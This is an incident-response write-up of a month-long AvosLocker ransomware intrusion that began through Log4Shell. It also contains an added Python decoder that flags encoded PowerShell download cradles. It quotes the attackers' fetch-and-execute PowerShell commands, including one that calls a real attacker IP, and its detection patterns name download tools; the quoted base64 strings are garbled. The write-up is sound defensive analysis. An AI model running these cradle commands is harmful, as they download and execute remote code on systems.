By Flavio Costa,
- In a recent customer engagement, we observed a month-long AvosLocker campaign.
- The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners.
- The initial ingress point in this incident was a pair of VMware Horizon Unified Access Gateways that were vulnerable to Log4Shell. Although Cisco security appliances were deployed on the network, they were never configured, which allowed the attacker to reach internal servers and maintain a foothold.
- While the attacker was active in the network, several security events were detected by the security products but were never reviewed by the security team; acting on them could have prevented the ransomware deployment.
Threat Actor Profile: Avos
Avos is a ransomware group first identified in 2021 initially targeting Windows machines. More recently, a new ransomware variant of AvosLocker, named after the group, is also targeting Linux environments. Well-funded and financially motivated, Avos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, an affiliate program to recruit potential partners. The announcement of the program includes information about the features of the ransomware and lets affiliates know that AvosLocker operators will handle negotiation and extortion practices. The user "Avos" has also been observed trying to recruit individuals on the Russian forum XSS.
Typically, Avos uses spam email campaigns as the initial infection vector to deliver its ransomware. In this particular incident, however, the initial vector was an ESXi server exposed to the internet through VMware Horizon Unified Access Gateways (UAG) that were vulnerable to Log4Shell. The customer notified Talos on March 7, 2022, but had noticed activity related to the ransomware attack as far back as Feb. 7, 2022.
Several vulnerabilities associated with Log4j, listed below, were found on this customer's UAG:
These vulnerabilities can allow remote code execution on the Unified Access Gateway in the context of the low-privilege, non-root user "gateway". Beyond that, the internal transit firewalls that could have controlled or limited access to the internal infrastructure were never configured, so the attackers used the compromised gateways as their initial access point to establish a foothold on the customer's network and reach its internal servers.
The victim in this case used Cisco Secure Endpoint (formerly known as Advanced Malware Protection) as its EPP/EDR solution on most endpoints, from workstations to servers, which allowed Talos to collect important information about the entire attack lifecycle.
During the initial phases of the attack, the threat actor took numerous steps to gain a foothold on the victim network. Several payloads and malicious tools were observed on endpoints, alongside the use of living-off-the-land binaries (LoLBins).
Talos observed the attackers using the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of entry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.
Three days later, on Feb. 14, a retrospective detection was triggered for the RuntimeBrokerService.exe executable in "C:\Windows\System32\temp\" for creating a file called "watcher.exe." These particular files may be artifacts from a separate threat actor, as these files appear to be related to a cryptocurrency miner rather than AvosLocker. It is not uncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue. However, there is significant evidence that multiple threat actors had compromised this network, as DarkComet samples unrelated to this campaign were also discovered.
Approximately four weeks later on March 4, another encoded PowerShell command was executed, shown below, again utilizing the DownloadString method.
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=
iex (New-Object System.Net.WebClient).DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');
Two days later, on March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload named "vmware_kb.exe". Team Cymru has observed the deployment of this same executable in a similar campaign, as described in its blog post on Sliver. In the following days, several PowerShell scripts downloaded additional files, including Mimikatz and a .zip archive called "IIS Temporary Compressed Files.zip" containing Cobalt Strike beacons and a port scanner named "scanner.exe." This port scanner is SoftPerfect Network Scanner, a commercially available product that Avos is known to deploy. Later that same day, the attackers used WMIC to modify administrative settings on both a local and a remote host, behavior indicative of the first stages of lateral movement.
Another PowerShell command observed on March 6, shown below, is an artifact from a Cobalt Strike beacon executing its powershell-import function:
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A dwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcALwAnACkA
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:32467/')
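Decoding the -EncodedCommand argument is the first step to seeing what a logged PowerShell command line actually does. The following is an added example written for this post, not Talos tooling or code recovered from the attackers: it decodes the base64/UTF-16LE argument that powershell.exe accepts after -enc or any of its accepted prefixes, checks the result for the IEX plus DownloadString cradle pattern seen above, and treats a loopback URL as the Cobalt Strike powershell-import artifact just described. The sample command lines are constructed for the example; 203.0.113.5 is an RFC 5737 documentation address, not the incident's infrastructure.

```python
"""Decode PowerShell -EncodedCommand payloads and flag download cradles.

Added example for this write-up (not Talos or Cisco code). It decodes the
base64/UTF-16LE argument that powershell.exe takes after -enc/-EncodedCommand
and checks the result for the IEX + DownloadString pattern seen in the incident.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# Download-cradle building blocks to look for in the decoded script.
CRADLE_PATTERNS = {
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "download": re.compile(r"\.download(?:string|file|data)\s*\(", re.I),
    "iwr": re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
EXEC_BYPASS_RE = re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I)


@dataclass
class Verdict:
    encoded: bool                 # an -EncodedCommand style flag was present
    decoded: Optional[str]        # decoded script, or None if decoding failed
    urls: List[str]
    indicators: List[str]
    decode_error: Optional[str] = None

    @property
    def is_cradle(self) -> bool:
        # Remote fetch plus in-memory execution is what makes it a cradle.
        fetch = {"download", "iwr"} & set(self.indicators)
        return bool(fetch) and "iex" in self.indicators


def is_encoded_flag(tok: str) -> bool:
    """powershell.exe resolves parameters by unambiguous prefix, so -e, -ec,
    -enc and -EncodedCommand all select EncodedCommand (-ex*/-ep are other
    parameters and must not match)."""
    f = tok.lstrip("-/").lower()
    return f in ("e", "ec") or (len(f) >= 2 and "encodedcommand".startswith(f))


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(cmdline: str) -> Verdict:
    """Decode the -enc argument if present and score the script for cradle indicators."""
    tokens = cmdline.split()  # base64 contains no whitespace, so a plain split is enough
    encoded, decoded, err = False, None, None
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            encoded = True
            try:
                decoded = decode_encoded_command(tokens[i + 1])
            except (binascii.Error, UnicodeDecodeError, ValueError) as exc:
                # Garbled or truncated base64 (common in copied logs) must not crash the parser.
                err = f"{type(exc).__name__}: {exc}"
            break
    script = decoded if decoded is not None else cmdline
    indicators = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(script)]
    urls = URL_RE.findall(script)
    if any(u.lower().startswith(("http://127.", "http://localhost")) for u in urls):
        # A loopback URL in a cradle is the Cobalt Strike powershell-import pattern:
        # the beacon serves the imported script from a local port.
        indicators.append("loopback_url")
    if EXEC_BYPASS_RE.search(cmdline):
        indicators.append("exec_bypass")
    return Verdict(encoded, decoded, urls, indicators, err)


# Constructed sample command lines. The first two reproduce the shape of the
# commands in the write-up; 203.0.113.5 is an RFC 5737 documentation address,
# not the incident's infrastructure.
SAMPLES = {
    "cradle": "powershell.exe -exec bypass -enc " + encode_command(
        "iex (New-Object System.Net.WebClient).DownloadString('http://203.0.113.5:4000/D234R23');"),
    "cs_import": "powershell -nop -exec bypass -EncodedCommand " + encode_command(
        "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:32467/')"),
    "benign": "powershell.exe -NoProfile -Command Get-Service",
    "garbled": "powershell.exe -enc aQBlAHgAIAA",  # truncated base64, as in a mangled log copy
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        v = analyze(cmd)
        print(f"{name:10} encoded={v.encoded} cradle={v.is_cradle} "
              f"indicators={v.indicators} urls={v.urls}")
```

Run over EDR process-creation telemetry, the decoded script rather than the raw command line is what you would match further detections against; the garbled sample shows why decoding must be tolerant, since base64 copied out of a console or ticket (like the encoded strings reproduced in this post) is frequently damaged.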
On March 8, another instance of the SoftPerfect Network Scanner was transferred via AnyDesk to another server in the network. Later that day, the AvosLocker payload was finally delivered, using the victim's company name as the filename.
To spread the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool. Once the ransomware was delivered, the victim's files were encrypted and a ransom note was displayed, shown below.
This incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and patches are applied and the security team is always monitoring alerts. While the attack techniques used in this campaign are not novel, they are still effective if the proper precautions are not in place.
With a highly motivated threat actor like Avos actively recruiting affiliates, these attacks are likely to proliferate in the future. Such attackers constantly hunt for vulnerable networks and can infiltrate them with relative ease, and, as seen in this case, a single network can be compromised by multiple threat actors at once. A layered defense model is therefore imperative to detect, contain and protect against post-exploitation activity. While static and network-based detection is important, it should be complemented with properly configured system behavior analysis and endpoint protections.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.
Cobalt Strike artifacts
IIS Temporary Compressed Files.zip